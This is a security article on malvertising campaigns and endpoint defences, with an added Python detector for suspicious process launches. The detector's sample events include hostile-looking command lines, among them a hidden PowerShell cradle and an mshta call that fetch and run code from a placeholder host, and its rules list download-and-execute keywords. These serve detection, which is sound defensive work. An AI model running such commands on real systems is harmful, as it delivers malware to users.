Malvertising emerges as growing access point for cybercriminals

Malicious online ads, or malvertising, have become one of the easiest ways for cybercriminals to break into systems, no hacking required. By exploiting legitimate advertising networks, attackers can deliver malware to unsuspecting users, often without any direct interaction.

Earlier this year, Microsoft Threat Intelligence uncovered a large-scale malvertising campaign that compromised nearly one million devices globally. The attackers used malicious advertisements to redirect users from illegal streaming sites to GitHub-hosted malware, demonstrating how malvertising can exploit trusted platforms to deliver malicious payloads without direct user interaction.

While many of these attacks are aimed at consumers, the consequences often spill into corporate environments. Employees may encounter malicious ads while using work devices for personal browsing or while performing work-related duties. Once malware reaches a company endpoint, it can hijack browser sessions, steal credentials, or deploy payloads that move laterally through the network. For businesses, the entry point may look like a harmless ad — but the fallout can be anything but.

How malvertising works

Malvertising embeds malicious code in online advertisements, which are then distributed through legitimate ad networks. These ads may appear on trusted, high-traffic websites, giving them the appearance of legitimacy.

Once loaded, the ad may silently redirect the user to a malicious site or initiate code execution in the browser. In some cases, no click is necessary — malware is delivered based solely on how the ad loads and fingerprints the user’s device.

Malvertising techniques used in recent campaigns

Recent campaigns show how threat actors continue to refine their methods, and how damaging those methods can be for businesses as well as consumers.

Fake AI video generators: In May 2025, Mandiant reported that a threat group tracked as UNC6032 launched a malvertising campaign impersonating popular AI video tools like Luma AI and Canva Dream Lab. The attackers created counterfeit websites promoted through Facebook and LinkedIn ads, enticing users to download malware disguised as AI-powered video editors. These malicious downloads deployed Python-based infostealers and backdoors, compromising users' systems and exfiltrating sensitive data.  

Hijacked social accounts: At the beginning of this year, Check Point Research reported that cybercriminals hijacked verified Facebook pages, rebranded them as AI photo apps like Kling AI, a popular AI-powered image and video synthesis tool, and ran paid ad campaigns that lured users to malware downloads disguised as image editors.

Fake software installers: Last year, attackers placed malicious ads posing as downloads for popular tools like WinSCP, PuTTY, and OBS Studio. Victims who clicked were led to counterfeit sites that served ransomware or info-stealers such as RedLine and IcedID.

The brands cybercriminals hid behind in these attacks (Meta, Luma AI, Canva Dream Lab, Kling AI, WinSCP, PuTTY, and OBS Studio) were not directly compromised, but the fallout still affects them.

When attackers use brand names to distribute malware, it can erode public trust, damage reputations, and burden legitimate developers with support issues and misinformation. Platforms like Google, Facebook, and LinkedIn may also face criticism for enabling malicious ads that appear alongside or even above legitimate listings.  

As these campaigns become more sophisticated, the reputational and financial risks extend well beyond individual victims to the brands being impersonated, and the platforms that unknowingly help deliver the bait.

Why traditional defenses fail

Common endpoint security tools often miss these attacks due to how they operate. Many malvertising payloads are fileless, running in memory using PowerShell or JavaScript, and evading antivirus software that only scans files at rest.

Other failures include:

  • DNS filters that allow traffic from trusted services like Firebase or Cloudflare
  • MFA bypass via session hijacking — no login is triggered, so no secondary challenge is presented
  • Ad platform review systems that fail to detect redirect swaps after campaign approval

How to strengthen endpoint defense

The best approach is a proactive, execution-focused defense model that stops malvertising at the endpoint.

For organizations, the real risk isn’t just that employees might click on a bad ad; it’s that a single lapse in execution control can open the door to credential theft, ransomware, or network compromise. Malvertising bypasses perimeter defenses by preying on human behavior and abusing trusted infrastructure, leaving endpoint security as the last, and most critical, line of defense.

Implementing a default-deny posture at the endpoint level ensures that even if users are exposed to malicious ads, payloads can’t run, privileges can’t escalate, and lateral movement is stopped in its tracks. In today’s threat landscape, businesses can no longer afford to rely on reactive tools alone. Proactive, policy-driven controls are essential to shutting down threats before they ever gain a foothold.

Key tactics include:

  • Ringfencing and script control to limit what apps and scripts can do or access
  • PowerShell restrictions to prevent clipboard-executed attacks like ClickFix
  • Real-time auditing for visibility into command-line behavior and privilege escalations
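As an added example (not ThreatLocker's code or product logic), the Python below applies the command-line auditing tactic above to constructed process-creation events: it scores the fileless PowerShell and script-host patterns described under "Why traditional defenses fail" (hidden window, execution-policy bypass, encoded and in-memory download commands) together with the ClickFix-style pattern of a user-facing app spawning an interpreter. The event fields, rule weights, threshold and placeholder.invalid URL are assumptions for illustration.

```python
import base64, binascii, ntpath, re

# Constructed sample process-creation events (simplified Sysmon Event ID 1 fields); placeholder.invalid is not a real indicator.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -ep bypass -c "iex (iwr https://placeholder.invalid/p)"'},
    {"parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://placeholder.invalid/x.hta"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -EncodedCommand " + base64.b64encode("Get-Date".encode("utf-16le")).decode()},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\inventory.ps1"},
]

# User-facing apps that should rarely spawn a script interpreter directly (Run-dialog / ClickFix pattern); assumed lists.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "winword.exe", "excel.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
RULES = [  # (label, weight, regex) applied to the command line plus any decoded -EncodedCommand payload
    ("in-memory download/execute cradle", 3, r"\b(?:iwr|invoke-webrequest|invoke-expression|iex|downloadstring|net\.webclient)\b"),
    ("hidden window", 2, r"-w(?:indowstyle)?\s+hidden"),
    ("execution policy bypass", 2, r"-e(?:xecutionpolicy|p)\s+bypass"),
    ("encoded command", 2, ENCODED.pattern),
]

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent or undecodable."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except binascii.Error:
        return ""

def score_event(ev):
    """Score one process-creation event; returns (score, [reason labels])."""
    parent, image = ntpath.basename(ev["parent"]).lower(), ntpath.basename(ev["image"]).lower()
    text = ev["cmdline"] + " " + decode_encoded_command(ev["cmdline"])  # inspect the decoded payload as well
    hits = [(label, w) for label, w, rx in RULES if re.search(rx, text, re.I)]
    if parent in INTERACTIVE_PARENTS and image in INTERPRETERS:
        hits.insert(0, ("interpreter spawned by user-facing app", 3))
    if image in {"mshta.exe", "rundll32.exe", "regsvr32.exe"} and re.search(r"https?://", text, re.I):
        hits.append(("script host fetching remote content", 2))
    return sum(w for _, w in hits), [label for label, _ in hits]

def detect(events, threshold=5):
    """Return (image, score, reasons) for every event scoring at or above the threshold."""
    scored = [(ntpath.basename(ev["image"]).lower(), *score_event(ev)) for ev in events]
    return [(image, score, reasons) for image, score, reasons in scored if score >= threshold]
```

Run against SAMPLE_EVENTS, only the explorer.exe-spawned PowerShell cradle and the browser-spawned mshta fetch cross the threshold; the encoded but benign Get-Date and the scheduled inventory script stay below it, which is the kind of context an execution-control policy needs before blocking.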

Training users to avoid suspicious ads and verifying the legitimacy of download sources are also critical components of a defense-in-depth strategy.
